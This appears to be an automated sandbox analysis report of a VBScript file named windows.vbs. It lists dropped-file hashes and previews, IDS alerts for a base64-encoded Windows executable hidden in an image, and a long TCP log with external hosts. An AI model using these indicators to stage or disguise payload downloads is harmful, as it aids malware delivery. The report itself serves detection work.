                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\wscript.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):3.5020180897627275
                Encrypted:false
                SSDEEP:3:2PlUPHlllrI2Y1AnqTUXulLn:iUNoGqTUqLn
                MD5:6810E3AFA39F1D93ADCD289071652FF9
                SHA1:592860A53A5E4CB85D37BF56542707F0F4045D4A
                SHA-256:77FA92E8F882383895F21CF27F60E98A7D8035DE2D3E40B838DF12CB0DFEC5CC
                SHA-512:422DE69459D7292B8D6E5C7C50429F72510648F35CDFCC3C1440D7E32365395BD21B3DB8231437B6424A568341C145E0DD9AB3D0C7C0AC57BF3DF9AC4B91E673
                Malicious:false
                Preview:....9.8.0.1.0.8.....\MAILSLOT\NET\GETDCACAD1E99.................
                Process:C:\Windows\System32\wscript.exe
                File Type:GLS_BINARY_LSB_FIRST
                Category:dropped
                Size (bytes):160
                Entropy (8bit):4.438743916256937
                Encrypted:false
                SSDEEP:3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
                MD5:E467C82627F5E1524FDB4415AF19FC73
                SHA1:B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
                SHA-256:116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
                SHA-512:2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
                Malicious:false
                Preview:................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............
                Process:C:\Windows\System32\wscript.exe
                File Type:GLS_BINARY_LSB_FIRST
                Category:dropped
                Size (bytes):160
                Entropy (8bit):4.577654635909331
                Encrypted:false
                SSDEEP:3:rmHfvtH//Sy3yeM1y73yeUUGk+l91F3ye0Zty:rmHcy3HL73HNGFlXF3HIty
                MD5:86EFD27334586B592E7BFBD0E143C450
                SHA1:E8D1FF64BB20235FD4AF6D8051A4CD4A19B91BDE
                SHA-256:4AA9CA41BA628CDB8E337FCD8929F6BD8D68997E120A8C925BFA1C311AD7DFB4
                SHA-512:3FA13E0456C17D061B40F512CD5615F0B46F82E2095F82C0EB4D1D3E8DAF1ECE475028EB77C78C0FF91E034B745F3FD3C1F0C5AE87FBAEB69F67B1C69F547048
                Malicious:false
                Preview:...................................k...6.3F..~4Z.....]..........+.H`...........k...6.3F..~4Z....3.qq..7I......6...........k...6.3F..~4Z....,..l..@E............
                File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Entropy (8bit):3.4132511064424063
                TrID:
                • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                • MP3 audio (1001/1) 32.22%
                • Lumena CEL bitmap (63/63) 2.03%
                • Corel Photo Paint (41/41) 1.32%
                File name:windows.vbs
                File size:62'692 bytes
                MD5:8a5e37c6fd7a447899334a45c67e6478
                SHA1:addb4be872ec8a1e7e93cc2b838d135dc8aa8866
                SHA256:cea70e9ba4598a0d3b730237fc235a4f96ab7db9d0e69915b496171a7f479999
                SHA512:5578da861171ad5760fe5ad67e5837d6da67462b2874b7f50ca82ecac2df77adbe641a8386fdf5f20140e2dc534fae5401cdc8b063f4813fe5a32099940fbdd3
                SSDEEP:384:FZAaML00qqGOg0npMoNRIRpuSkz6jM1L7Kc0ZKEXJg:7x4ioNRIRgSkzq9Z5Zg
                TLSH:E6536B526BEA2108B5F7BA48997A41344F3779C9AD7DC94E05CC291D0BF3E84CC60BA7
                File Content Preview:..'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....'.....'. .C.o.p.y.r.i.g.h.t. .(.c.). .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n... .A.l.l. .r.i.g.h.t.s. .r
                Icon Hash:68d69b8f86ab9a86
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                05/23/24-18:26:42.231791TCP2018856ET TROJAN Windows executable base64 encoded44349721188.114.96.3192.168.2.12
                05/23/24-18:26:42.231791TCP2047750ET TROJAN Base64 Encoded MZ In Image44349721188.114.96.3192.168.2.12
                TimestampSource PortDest PortSource IPDest IP
                May 23, 2024 18:26:30.443296909 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:30.443337917 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:30.443630934 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:30.446729898 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:30.446743965 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.044446945 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.044595957 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.153501034 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.153522968 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.154007912 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.154056072 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.156105042 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.198503971 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.428208113 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.428334951 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.428349018 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.428483009 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.430025101 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.430182934 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.430191040 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.430315018 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.433584929 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.433629990 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.435369015 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.435523987 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.439043045 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.439161062 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.439173937 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.439223051 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.452424049 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.453202009 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.454076052 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.454381943 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.456041098 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.456418037 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.457659960 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.458357096 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.459382057 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.459734917 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.465526104 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.465598106 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.465609074 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.465630054 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:31.465677023 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.465677023 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.465939999 CEST49716443192.168.2.12188.114.97.3
                May 23, 2024 18:26:31.465955973 CEST44349716188.114.97.3192.168.2.12
                May 23, 2024 18:26:36.193921089 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:36.193972111 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:36.194526911 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:36.204663038 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:36.204705954 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:36.770363092 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:36.770447016 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:36.774566889 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:36.774593115 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:36.774914026 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:36.782160044 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:36.826510906 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.284406900 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.284634113 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.284661055 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.284724951 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.284754992 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.284794092 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.285339117 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.288988113 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.289078951 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.289089918 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.293764114 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.293860912 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.293870926 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.299151897 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.299263000 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.299272060 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.306020975 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.306124926 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.306133986 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.350179911 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.370167971 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.370645046 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.370698929 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.370731115 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.373641014 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.373725891 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.373735905 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.374454021 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.374505997 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.374515057 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.374985933 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.375118017 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.375125885 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.376606941 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.376709938 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.376718998 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.377326965 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.377378941 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.377387047 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.378267050 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.378317118 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.378324986 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.379873991 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.379904032 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.379923105 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.379931927 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.379966974 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.380744934 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.381937027 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.381990910 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.382000923 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.382400990 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.382453918 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.382469893 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.382478952 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.382517099 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.458756924 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.459541082 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.459569931 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.459595919 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.459623098 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.459635973 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.459664106 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.464540005 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.464602947 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.464611053 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.464653969 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.465658903 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.465708017 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.465713978 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.465754986 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.466382980 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.466429949 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.468030930 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.468095064 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.468671083 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.468719006 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.469616890 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.469666004 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.470501900 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.470554113 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.471318007 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.471368074 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.472940922 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.472990036 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.859256983 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.859422922 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.859515905 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.859580994 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.861012936 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.861078024 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.861372948 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.861435890 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.862256050 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.862312078 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.863174915 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.863230944 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.864038944 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.864094973 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.866513968 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.866578102 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.866600037 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.866647959 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.866669893 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.866714954 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.867569923 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.867764950 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.868521929 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.868607998 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.868608952 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.868635893 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.868658066 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.869591951 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.869652987 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.869678020 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.870434046 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.870491982 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.870503902 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.872353077 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.872412920 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.872427940 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.873641014 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.873699903 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.873711109 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.873729944 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.873778105 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.873785973 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.874327898 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.874380112 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.874388933 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.875154972 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.875209093 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.875220060 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.875926971 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.875953913 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.875972033 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.875983953 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.876008987 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.876017094 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.876785994 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.876835108 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.877711058 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.877758980 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.878388882 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.878442049 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.879770041 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.879801035 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.879827976 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.879842997 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.879857063 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.880001068 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.880027056 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.880040884 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.880053043 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.880069017 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.881014109 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.881077051 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.881089926 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.882514954 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.882972956 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.882991076 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.883030891 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.883040905 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.883085966 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.883104086 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.885304928 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.885358095 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.885380030 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.885396004 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.885421991 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.887398958 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.887417078 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.887456894 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.887471914 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.887495995 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.889307022 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.889327049 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.889379978 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.889395952 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.892767906 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.892787933 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.892848015 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.892865896 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.894367933 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.894385099 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.894473076 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.894495964 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.895555019 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.895602942 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.895785093 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.895801067 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.895863056 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.895873070 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.897871971 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.897901058 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.897938013 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.897953033 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.898026943 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.899198055 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.899214983 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.899252892 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.899264097 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.899277925 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.901613951 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.901633024 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.901678085 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.901699066 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.901715994 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.902141094 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.902154922 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.902230024 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.902245998 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.904439926 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.904465914 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.904500008 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.904510975 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.904532909 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.906055927 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.906119108 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.906137943 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.906146049 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.906174898 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.907228947 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.907260895 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.907290936 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.907296896 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.907315969 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.908612967 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.908637047 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.908688068 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.908694983 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.909620047 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.909650087 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.909677982 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.909683943 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.909706116 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.910608053 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.910635948 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.910670042 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.910690069 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.910701036 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.912379980 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.912417889 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.912445068 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.912451029 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.912461042 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.913325071 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.913345098 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.913386106 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.913393021 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.913413048 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.914274931 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.914299011 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.914335012 CEST49720443192.168.2.12188.114.96.3
                May 23, 2024 18:26:37.914340973 CEST44349720188.114.96.3192.168.2.12
                May 23, 2024 18:26:37.914365053 CEST49720443192.168.2.12188.114.96.3
